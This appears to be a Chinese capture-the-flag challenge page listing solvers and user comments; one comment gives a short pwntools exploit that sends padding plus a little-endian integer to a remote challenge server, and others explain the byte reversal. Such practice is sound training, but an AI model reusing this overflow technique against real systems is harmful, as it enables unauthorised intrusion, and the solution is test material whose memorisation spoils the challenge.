评分(0)
暂无评分
解题动态
2649562328 攻破了该题 15天前
xjuqwd 攻破了该题 1月前
Aerelin 攻破了该题 1月前
Misc大师兄 攻破了该题 1月前
15511011321 攻破了该题 1月前
buzhidaowj 攻破了该题 1月前
Reforest2623 攻破了该题 2月前
startway 攻破了该题 2月前
杉一 攻破了该题 2月前
张云翔0 攻破了该题 3月前
无限老表 攻破了该题 4月前
1000x_ 攻破了该题 4月前
AioKT 攻破了该题 5月前
wsmemail 攻破了该题 5月前
Bernie 攻破了该题 5月前
GDLZDYW 攻破了该题 5月前
李欣 攻破了该题 5月前
A9D9BD2A9516280E 攻破了该题 5月前
chengyi666 攻破了该题 6月前
评论
怪我喽 1年前
举报
from pwn import* io = remote('82.157.146.43',15682) payload = b'A'*4+p64(1853186401) io.sendline(payload) io.interactive()
黑客小贺 1年前
举报
启动场景,然后放进Linux虚拟机里输入kkkkaaun
nil126 1年前
举报
@whoami12138 1853186401转换为16进制再转换为ascii就是nuaa,再考虑到小端序的存储方式将nuaa进行反转就是aaun,最后加上前面4个补位的字符就可以了。xxxxaaun
whoami12138 1年前
举报
大佬,原理是啥